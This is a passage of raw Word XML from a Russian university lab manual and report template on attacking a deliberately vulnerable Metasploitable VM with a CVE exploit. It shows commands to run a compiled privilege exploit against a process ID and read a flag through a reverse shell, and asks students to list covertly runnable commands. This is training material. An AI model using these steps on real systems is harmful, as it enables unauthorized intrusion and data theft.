      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A333D7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidR="00A333D7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(при прослушивании порта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD4BCE" w14:textId="77777777" w:rsidR="006D0756" w:rsidRDefault="006D0756" w:rsidP="003160E1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D0756">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A45AF75" wp14:editId="2F7B6F69">
            <wp:extent cx="5758180" cy="1790611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041" b="11553"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="179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1E1CD" w14:textId="4E6D1447" w:rsidR="006D0756" w:rsidRPr="00FB0948" w:rsidRDefault="006D0756" w:rsidP="00035924">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PID</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0948">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>равен 2410</w:t>
      </w:r>
      <w:r w:rsidR="00A333D7">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A333D7">
        <w:t>метаэсплойдебл</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A333D7">
        <w:t xml:space="preserve"> на кали)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE5E397" w14:textId="77777777" w:rsidR="006042CD" w:rsidRDefault="006042CD" w:rsidP="00035924"/>
    <w:p w14:paraId="4A2CF4A2" w14:textId="4D5C7AF5" w:rsidR="006D0756" w:rsidRPr="00FB0948" w:rsidRDefault="003160E1" w:rsidP="00035924">
      <w:r>
        <w:t>41</w:t>
      </w:r>
      <w:r w:rsidR="006D0756" w:rsidRPr="00FB0948">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006D0756">
        <w:t>Запустим наш скомпилированный эксплойт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B1BEC6" w14:textId="77777777" w:rsidR="002874AC" w:rsidRPr="009A4F16" w:rsidRDefault="002874AC" w:rsidP="00035924">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003160E1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A4F16">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 755 </w:t>
      </w:r>
      <w:r w:rsidRPr="003160E1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F07630" w14:textId="77777777" w:rsidR="002874AC" w:rsidRPr="009A4F16" w:rsidRDefault="002874AC" w:rsidP="00035924">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A4F16">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003160E1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidRPr="009A4F16">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2410</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA69B30" w14:textId="77777777" w:rsidR="00B15DFF" w:rsidRDefault="00305AB8" w:rsidP="003160E1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305AB8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E61E291" wp14:editId="3B349018">
            <wp:extent cx="5760000" cy="530653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63CB" w14:textId="77777777" w:rsidR="00305AB8" w:rsidRDefault="00305AB8" w:rsidP="00B15DFF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79AD370A" w14:textId="6B5939D4" w:rsidR="00E80E53" w:rsidRDefault="003160E1" w:rsidP="00B15DFF">
      <w:r>
        <w:t>42</w:t>
      </w:r>
      <w:r w:rsidR="00E80E53">
        <w:t>. Получи</w:t>
      </w:r>
      <w:r>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidR="00866471">
        <w:t xml:space="preserve"> данные из ранее созданного </w:t>
      </w:r>
      <w:commentRangeStart w:id="15"/>
      <w:r w:rsidR="00866471">
        <w:t>флаг</w:t>
      </w:r>
      <w:r w:rsidR="00E80E53">
        <w:t>а</w:t>
      </w:r>
      <w:commentRangeEnd w:id="15"/>
      <w:r w:rsidR="006042CD">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="15"/>
      </w:r>
      <w:r w:rsidR="00A333D7">
        <w:t xml:space="preserve"> (делается в реверс шел </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A333D7">
        <w:t>там где</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A333D7">
        <w:t xml:space="preserve"> 555)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052561BD" w14:textId="77777777" w:rsidR="00E80E53" w:rsidRPr="003160E1" w:rsidRDefault="00E80E53" w:rsidP="00B15DFF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003160E1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cd /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003160E1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="062340BE" w14:textId="77777777" w:rsidR="00E80E53" w:rsidRPr="003160E1" w:rsidRDefault="00E80E53" w:rsidP="00E80E53">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003160E1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ls –l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11776B87" w14:textId="77777777" w:rsidR="00E80E53" w:rsidRPr="003160E1" w:rsidRDefault="00E80E53" w:rsidP="00E80E53">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003160E1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cat flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D64DDDB" w14:textId="77777777" w:rsidR="003938B0" w:rsidRDefault="003938B0" w:rsidP="003160E1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003938B0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0762385A" wp14:editId="767BB14D">
            <wp:extent cx="5760000" cy="12135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CCC" w14:textId="77777777" w:rsidR="003938B0" w:rsidRDefault="003938B0" w:rsidP="00E80E53"/>
    <w:p w14:paraId="3CE64777" w14:textId="25E102A0" w:rsidR="003938B0" w:rsidRPr="003160E1" w:rsidRDefault="003160E1" w:rsidP="00E80E53">
      <w:r>
        <w:t>В результате нам удалось п</w:t>
      </w:r>
      <w:r w:rsidR="003938B0">
        <w:t xml:space="preserve">олучили ранее введенный </w:t>
      </w:r>
      <w:r w:rsidR="003938B0" w:rsidRPr="009A4F16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или любую сохраненную в флаге конфиденциальную информацию)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315D4983" w14:textId="5BF6DFAE" w:rsidR="003E49E7" w:rsidRPr="005405C2" w:rsidRDefault="003E49E7">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005405C2">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBDF312" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="006A0213" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A0213">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Отчёт по результатам выполнения лабораторной работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7822C0F1" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="008E78E3" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E78E3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Титульный лист:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6850E1B9" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F05FEF" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:t xml:space="preserve">МИНИСТЕРСТВО НАУКИ И ВЫСШЕГО ОБРАЗОВАНИЯ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D129C" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:t>РОССИЙСКОЙ ФЕДЕРАЦИИ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDFF31F" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:t xml:space="preserve">ФГБОУ ВО «НАЦИОНАЛЬНЫЙ ИССЛЕДОВАТЕЛЬСКИЙ УНИВЕРСИТЕТ «МЭИ» </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637EADD2" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DDF4F06" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D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Факультет/институт</w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Инженерно-экономический институт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE744B6" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D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                                      (название факультета/института)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2543E86A" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D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Кафедра</w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Безопасности и информационных технологий»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3937EC5F" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0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(название кафедры)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3173C564" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:pStyle w:val="Style4"/>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="13500"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41684EBE" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:pStyle w:val="Style4"/>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="13500"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A19874" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27627448" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0713B558" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отчет по лабораторной работе № 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A209383" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EC7D850" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00F333B4" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Дисциплина</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F333B4">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Технологии защиты информационных систем от кибератак</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F333B4">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Тема:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F333B4">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Исследование сервисов уязвимой виртуальной машины с применением CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C25919" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr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356"/>
        <w:gridCol w:w="351"/>
        <w:gridCol w:w="149"/>
        <w:gridCol w:w="356"/>
        <w:gridCol w:w="629"/>
        <w:gridCol w:w="7"/>
        <w:gridCol w:w="955"/>
        <w:gridCol w:w="7"/>
        <w:gridCol w:w="25"/>
      </w:tblGrid>
      <w:tr w:rsidR="009A34D0" w14:paraId="60D464AC" w14:textId="77777777" w:rsidTr="00466A33">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51E0B413" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRDefault="009A34D0" w:rsidP="00466A33">
            <w:pPr>
              <w:spacing w:before="120"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D648EC">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>ыполнил студент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  <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34692C3F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94" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41D34394" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRDefault="009A34D0" w:rsidP="00466A33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 w:rsidRPr="00D648EC">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>курса</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A34D0" w:rsidRPr="00260D0B" w14:paraId="2757C4B8" w14:textId="77777777" w:rsidTr="00466A33">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:wAfter w:w="32" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4788" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F270781" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00260D0B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260D0B">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>очно-заочной формы обучения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A34D0" w14:paraId="082689ED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6D228D0D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Группа</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> №: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618A0D21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ИЭ-41-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A34D0" w14:paraId="61B4C187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498601E5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037BE5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9A34D0" w14:paraId="67294B99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6E7140DD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Проверил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</w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09D262E9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9A34D0" w14:paraId="1CE200ED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36462D4F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3D450BC9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Дратвяк А.В.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A34D0" w14:paraId="185F2227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254A54F2" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC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 xml:space="preserve">дата </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>проверки:</w:t>
            </w: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2FA9A161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«</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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A0DB6F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4B0EF8F5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»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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719B5C" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRDefault="009A34D0" w:rsidP="00466A33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62" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5961CF6B" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRDefault="009A34D0" w:rsidP="00466A33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2020г.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A34D0" w14:paraId="297CD9D1" w14:textId="77777777" w:rsidTr="00466A33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14ADE353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Оценка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6DF6A09F" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRDefault="009A34D0" w:rsidP="00466A33">
            <w:pPr>
              <w:spacing w:before="120" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35BCE9B0" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5DD8B5" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4F7471" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6532E0F9" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="00D648EC" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BEDAD0F" w14:textId="77777777" w:rsidR="009A34D0" w:rsidRPr="006A0213" w:rsidRDefault="009A34D0" w:rsidP="009A34D0">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Москва, 201_г.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B11EF48" w14:textId="34381C9B" w:rsidR="003E49E7" w:rsidRPr="001152AD" w:rsidRDefault="003E49E7" w:rsidP="003E49E7">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Результаты выполнения лабораторной работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F0058E" w14:textId="1CA3CDA4" w:rsidR="003E49E7" w:rsidRDefault="0058112A" w:rsidP="00E80E53">
      <w:r>
        <w:t>1. Результаты настройки сети для виртуальных машин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8112A" w14:paraId="21B9D7D2" w14:textId="77777777" w:rsidTr="0058112A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="653E4A6B" w14:textId="7F03F379" w:rsidR="0058112A" w:rsidRDefault="0058112A" w:rsidP="0058112A">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:bookmarkStart w:id="16" w:name="_Hlk34166387"/>
            <w:r>
              <w:t>Скриншот № 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="16"/>
    </w:tbl>
    <w:p w14:paraId="5314CA8B" w14:textId="2A8FABAD" w:rsidR="0058112A" w:rsidRDefault="0058112A" w:rsidP="00E80E53"/>
    <w:p w14:paraId="64B9D307" w14:textId="198583CA" w:rsidR="0058112A" w:rsidRDefault="00154310" w:rsidP="00E80E53">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00584642">
        <w:t>Результаты удалённого подключения к виртуальной машине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84642" w14:paraId="1D253880" w14:textId="77777777" w:rsidTr="002B2CDE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54F6DA65" w14:textId="556D811D" w:rsidR="00584642" w:rsidRDefault="00584642" w:rsidP="002B2CDE">
            <w:pPr>
              <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Скриншот № 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="321DA6CA" w14:textId="64FF0F39" w:rsidR="00584642" w:rsidRDefault="00584642" w:rsidP="00E80E53"/>
    <w:p w14:paraId="27F7E7CF" w14:textId="09CDE28C" w:rsidR="00584642" w:rsidRDefault="00584642" w:rsidP="00E80E53">
      <w:r>
        <w:t>3. Привести перечень команд, которые теперь могут быть скрытно выполнены на управляемой виртуальной машине</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A78D3BA" w14:textId="485F4942" w:rsidR="00584642" w:rsidRDefault="00584642" w:rsidP="00E80E53"/>
    <w:p w14:paraId="0A8A35C8" w14:textId="5913F227" w:rsidR="00584642" w:rsidRDefault="00584642" w:rsidP="00E80E53">
      <w:r>
        <w:t>4.</w:t>
      </w:r>
